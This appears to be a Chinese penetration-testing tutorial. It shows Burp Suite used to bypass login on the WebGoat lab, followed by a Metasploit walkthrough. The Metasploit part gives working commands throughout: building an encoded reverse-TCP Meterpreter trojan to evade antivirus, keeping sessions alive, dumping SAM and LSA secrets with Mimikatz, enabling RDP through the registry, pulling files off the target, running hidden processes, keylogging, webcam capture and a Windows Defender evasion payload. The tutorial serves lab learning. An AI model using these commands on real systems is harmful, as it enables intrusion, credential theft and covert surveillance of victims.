渗透测试_漏洞利用

Burp Suite

KaLi 启动 Burp Suite





配置代理


Interceept on/off 是否拦截HTTP流量
Forward 会将流量转发到请求地址
Drop 会将请求流量丢弃
Open Browser 会将请求流量通过浏览器打开


证书下载

方式一:导出功能下载





方式二:网页下载


FireFox浏览器 配置代理及证书







重启BurpSuite,需浏览器重启配置证书

BurpSuite 开启 Intercept on拦截功能,浏览器访问 www.baidu.com 进行测试效果

实例:构造异常请求,绕过身份验证,登录界面

浏览器访问 OWASP WebGoat 靶机

只输入用户名(webgoat)进行登录,可以看到网页是无效登录

构造请求包,将请求变成一场请求从而绕过验证登录

开启拦截功能

再次在OWASP WebGoat界面只填写用户名进行登录

可以在BurpSuite中看到用户名、密码、登录的拦截信息

删除选中的Password字段内容,单击 Forward 将请求转发到请求地址

成功构造出的异常请求将登录验证终端,从而成功绕过身份验证,直接登录到用户界面

Metasploit 渗透测试框架

  • Metasploit 是一个开源的渗透测试框架,由Rapid7公司和社区共同开发、维护
  • 它是世界上使用最广泛的渗透测试工具,可以帮助安全团队发现和利用系统漏洞、管理安全评估、提高安全意识
  • Metasploit框架是由 Ruby语言编写,其各个目录作用如下

/usr/share/metasploit-framework/

msfconsole 进入Metasploit 终端模式

shell 复制代码
msfconsole

msfvenom 查找所有可用的Payload

payload 指的是恶意代码中‌实际执行破坏性操作‌的核心部分

shell 复制代码
msfvenom -l payloads


显示仅支持Windows系统的Payload

shell 复制代码
msfvenom -l payloads | grep windows


msfvenom 查看可以使用的编码

通过编码方式可以使Payload带有绕过杀毒软件的效果

shell 复制代码
msfvenom -l encoders  


msfvenom生成木马文件

shell 复制代码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.2.23 LPORT=4444 -f exe > /root/muma.exe
-p 使用的payload
-e 使用的编码方式
-i 编码次数
LHOST 本机IP地址
LPORT 本机端口
-f 保存的文件格式
> 保存路径
-x 将payload附加到应用上 从而使应用在运行后也运行木马

利用木马文件开启目标系统远程桌面

use exploit/multi/handler 开启监听模块

set payload xxxx 修改payload

set payload windows/meterpreter/reverse_tcp

修改生成木马文件使用的payload,以监听该模块产生的会话请求

show options 查看模块配置

Required 列为 "YES"值的配置是必须设置的选项

set lhost xxxxx 修改本地IP
exploit 运行模块配置

在目标机 Windows7上运行木马文件,并返回KaLi Linux 查看监听
木马文件可通过各种手段传到目标系统内

可以看到监听成功,并且Metasploit 与目标主机之间建立 Meterpreter 会话

会话调优
shell 复制代码
set SessionCommunicationTimeout 0
set SessionExpirationTimeout 0

一个会话在5分钟之内没有做任何事情,将会被杀死,而将SessionCommunicationTimeout值修改为0可以避免这种情况

会话也会在一周后会被强制关闭,将SessionExpirationTimeout值修改为0将永不关闭

meterpreter会话(session)

Metasploit 与 目标主机建立的会话 为 Meterpreter

background

当前的Meterpreter会话,放到后台

sessions 切换指定会话
sessions -l

查看当下已激活的会话

ls

当前会话窗口下,模块运行情况

sysinfo

获取目标系统信息

ipconfig

获取目标的IP地址信息

getuid

获取目标主机的UID

getsystem 提升权限

如果不是系统权限或者管理员权限,使用该命令提升权限

use -l

查看Meterpreter会话所有可用的扩展插件

use 扩展插件 加载扩展插件

加载使用扩展插件

help

帮助菜单,如果加载了扩展插件,也会显示扩展插件的命令帮助

list_tokens -u

在加载了 incognito 插件前提下,使用该命令查看目标用户的Token

lsa_dump_sam

在加载了 Mimikatz 插件前提下,使用该命令 会转存储SAM库的内容

lsa_dump_secrets

在加载了 Mimikatz 插件前提下,使用该命令 会转存储LSA信息并解密

use post/windows/manage/enable_rdp 创建远程桌面的用户名和密码

shell 复制代码
show options
set password hello
set username hello
set session 1    //该会话号需与 Melasploit与目标主机建立的Meterpreter的session号一致
exploit

rdesktop IP地址 远程桌面命令


如果 rdesktop 尝试连接,但无法连接时


netstat 查看目标主机是否开放3389端口

shell 获取目标系统的交互式shell,在交互式shell下输入如下命令:

shell 复制代码
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

利用木马文件上传、下载目标系统文件

利用上文中的木马,通过Metasploit 与 目标主机建立 Meterpreter会话

download下载

将目标机的文件下载到攻击机系统中

目标主机当前工作目录文件加载
shell 复制代码
download user_info.txt /home/mikowoo/tmp/
指定目录地址文件下载
shell 复制代码
download C:\\Users\\mikowoo\\Desktop\\user_info_desk.txt /home/mikowoo/tmp/

upload上传

将文件上传到目标主机当前工作目录下
shell 复制代码
upload /home/mikowoo/tmp/kali_info.txt 


将文件上传到目标主机指定目录下
shell 复制代码
upload /home/mikowoo/tmp/kali_info.txt C:\\Users\\mikowoo\\Desktop

cat 查看文件

查看目标主机当前工作目录的文件内容
shell 复制代码
cat user_info.txt 
查看目标主机指定路径文件内容
shell 复制代码
cat C:\\Users\\mikowoo\\Desktop\\user_info_desk.txt 

edit 编辑目标主机的文件



目标主机已有的文件内容被替换,文本被编辑成攻击者写入的文件内容

execute 目标主机上执行程序

在目标主机上执行程序

以打开记事本程序为例

shell 复制代码
execute -f notepad.exe
在目标主机上隐藏进程执行应用程序

以打开记事本程序为例

shell 复制代码
execute -H -f notepad.exe


在目标主机上隐藏进程执行应用程序进行进行交互
shell 复制代码
execute -H -i -f cmd.exe

记录目标主机键盘录入内容

keyscan_start 开启键盘记录
keyscan_dump 键盘记录的内容查看


keyscan_stop 停止键盘记录

利用目标主机摄像头拍照

shell 复制代码
webcam_list				//目标主机当前摄像头
webcam_snap 摄像头ID    //通过目标主机摄像头拍照

目前作为测试的目标主机不具备摄像头,该命令未测试,回头找电脑测试

扫描并利用目标主机漏洞



生成绕过防火墙的木马文件

show evasion 查看外部所有模块的免杀规避模块

shell 复制代码
use evasion/windows/windows_defender_exe
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.2.23 //本机IP
run


相关推荐
pencek1 天前
HakcMyVM-Darkside
网络安全
lplum_1 天前
2026 中国高校智能机器人创意大赛 软件系统安全赛 初赛wp
安全·web安全·网络安全·系统安全·密码学·网络攻击模型·安全威胁分析
vortex51 天前
文件上传漏洞绕过技术总结(含实操指南与防御方案)
linux·服务器·网络安全·渗透测试
Atomic121381 天前
隧道搭建之端口复用
web安全·网络安全·渗透测试
pencek1 天前
HakcMyVM-RoosterRun
网络安全
努力的lpp1 天前
墨者学院登录密码重置漏洞分析溯源wp
网络·网络安全·ctf
瘾大侠1 天前
HTB - VariaType
网络·安全·web安全·网络安全
村中少年1 天前
个人网络安全自查之-你的openclaw(龙虾)是否暴露在公网
网络安全·应用安全·openclaw·clawbot·龙虾·养虾
白山云北诗1 天前
互联网常见网络攻击如何防护
网络·网络安全·ddos·waf·cc·安全防护
heze091 天前
sqli-labs-Less-48
数据库·mysql·网络安全